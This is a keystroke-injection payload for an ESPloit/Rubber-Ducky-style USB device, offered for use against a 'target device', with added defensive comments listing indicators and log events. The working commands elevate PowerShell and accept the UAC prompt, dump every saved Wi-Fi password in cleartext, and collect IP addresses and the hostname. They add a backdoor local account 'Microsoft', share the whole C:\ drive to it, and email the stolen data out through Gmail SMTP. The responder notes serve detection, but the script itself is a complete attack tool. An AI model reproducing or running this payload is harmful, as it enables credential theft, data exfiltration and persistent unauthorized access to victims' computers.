This simple script will grab all of the wifi passwords, external IP address, LAN address, and hostname of the target device and e-mail it to an address of your choice. I recommend you use a Gmail address for this. I have not had luck with Yahoo, Hotmail, etc... It then creates a user called Microsoft, and shares C:\ out to the new user. My goal …
Rem:Generated by Dckuino.js by NURRL | |
Rem:Modified for use with ESPloit by Corey Harding | |
Rem:----- | |
Rem:# Backdoor - Data Exfiltration | |
Rem:# Credit goes to Crumb93 and BrainEater from the Hak5 forums for the Wifi Password one liner | |
Rem:# Review (defensive summary): keystroke-injection payload made of Press:/Print:/CustomDelay: lines. | |
Rem:# It opens an elevated PowerShell, stages collected data in C:\Information.txt, adds a local user | |
Rem:# and an SMB share, mails the staged file out over SMTP, then deletes it. | |
Rem:# Host artifacts a responder can look for: C:\Information.txt (created, appended, then deleted), | |
Rem:# a new local account named "Microsoft", an SMB share named "Microsoft" rooted at C:\, and | |
Rem:# outbound connections to ipinfo.io (HTTP) and smtp.gmail.com on port 587. | |
Rem:# Because every command is typed into PowerShell, PowerShell script block logging (e.g. event 4104) | |
Rem:# records the full command text; account creation and share creation have their own security | |
Rem:# events (e.g. 4720 and 5142). USB HID device control stops the payload before it types anything. | |
Rem:# Key codes below look like Arduino Keyboard.h values (131=LEFT_GUI, 130=LEFT_ALT, 176=RETURN) - | |
Rem:# TODO confirm against the firmware's key map before relying on this reading. | |
CustomDelay:1000 | |
Rem:# presumably GUI+d (show desktop) followed by GUI+r (Run dialog) - verify | |
Press:131+100 | |
CustomDelay:450 | |
Press:131+114 | |
CustomDelay:450 | |
Rem:# Launches a second PowerShell with -Verb runAs, i.e. requests elevation and so triggers a UAC prompt. | |
Print:powershell Start-Process powershell -Verb runAs | |
CustomDelay:30 | |
Press:176 | |
CustomDelay:500 | |
Rem:# presumably ALT+y to accept the UAC prompt - only succeeds if the logged-in user can approve | |
Rem:# elevation without entering credentials; a standard-user account or credential-prompt UAC blocks it. | |
Press:130+121 | |
CustomDelay:1000 | |
Rem:***************** | |
Rem:# We're going to grab all wifi passwords | |
Rem:***************** | |
Rem:# Enumerates netsh wlan profiles with key=clear and writes PROFILE_NAME/PASSWORD pairs to C:\Information.txt | |
Rem:# (overwrite). Reading keys in the clear requires the elevation obtained above. | |
Print:(netsh wlan show profiles) | Select-String \"\\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=\"$name\" key=clear)} | Select-String \"Key Content\\W+\\:(.+)$\" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize > C:\\Information.txt | |
Press:176 | |
CustomDelay:500 | |
Rem:***************** | |
Rem:# Now we'll grab Network Information (Local IP, Public IP, Hostname) | |
Rem:***************** | |
Rem:# hostname, DHCP-assigned addresses, and the public IP fetched from ipinfo.io - the ipinfo.io request | |
Rem:# is an observable outbound HTTP call from the host (proxy/DNS logs). | |
Print:$command = {hostname; Get-NetIpaddress | Where PrefixOrigin -EQ DHCP; Invoke-RestMethod http://ipinfo.io/json | Select -exp ip} | |
Press:176 | |
CustomDelay:60 | |
Rem:# Appends the network information to the same staging file. | |
Print:$command.InvokeReturnAsIs() | Out-File C:\\Information.txt -Append | |
Press:176 | |
CustomDelay:400 | |
Rem:***************** | |
Rem:# We're going to add a user | |
Rem:***************** | |
Rem:# Persistence: creates local account "Microsoft" with a fixed password. An unexpected local account | |
Rem:# with this name is a direct indicator; local account creation is auditable. | |
Print:NET USER Microsoft \"l33t\" /ADD | |
Press:176 | |
CustomDelay:100 | |
Rem:***************** | |
Rem:# Now we're going to share the C:\ drive out | |
Rem:***************** | |
Rem:# Exposes the whole system drive over SMB to the new account. A share named "Microsoft" with path C:\ | |
Rem:# is the indicator; restricting inbound SMB (445) on workstations limits what this grants. | |
Print:New-SmbShare -Name \"Microsoft\" -Path \"C:\\\" -FullAccess \"Microsoft\" | |
Press:176 | |
CustomDelay:100 | |
Rem:***************** | |
Rem:# Let's e-mail ourselves and clean up | |
Rem:***************** | |
CustomDelay:1000 | |
Rem:# Exfiltration over SMTP/STARTTLS to smtp.gmail.com:587 from the victim host; workstations normally | |
Rem:# have no reason to open outbound 587 to a public mail provider, so this is egress-filterable. | |
Print:$SMTPServer = 'smtp.gmail.com' | |
Press:176 | |
Print:$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) | |
Press:176 | |
Print:$SMTPInfo.EnableSSL = $true | |
Press:176 | |
Rem:# The mailbox credentials are embedded in cleartext in the payload and are typed on the target, | |
Rem:# so they end up in PowerShell history/script block logs and in anything that captures the device. | |
Print:$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('EMAILHERE', 'PASSWORDHERE!') | |
Press:176 | |
Print:$ReportEmail = New-Object System.Net.Mail.MailMessage | |
Press:176 | |
Print:$ReportEmail.From = 'EMAILHERE' | |
Press:176 | |
Print:$ReportEmail.To.Add('EMAILHERE') | |
Press:176 | |
Rem:# Fixed subject line - a usable mail-filter / DLP signature. | |
Print:$ReportEmail.Subject = 'Hello from the duck' | |
Press:176 | |
Print:$ReportEmail.Body = (Get-Content C:\\Information.txt | out-string) | |
Press:176 | |
Print:$SMTPInfo.Send($ReportEmail) | |
Press:176 | |
CustomDelay:100 | |
Rem:***************** | |
Rem:# Cleanup | |
Rem:***************** | |
Rem:# Deletes the staging file only; the account and the share created above are left in place. | |
Print:del C:\\Information.txt | |
Press:176 | |
Print:exit | |
Press:176 |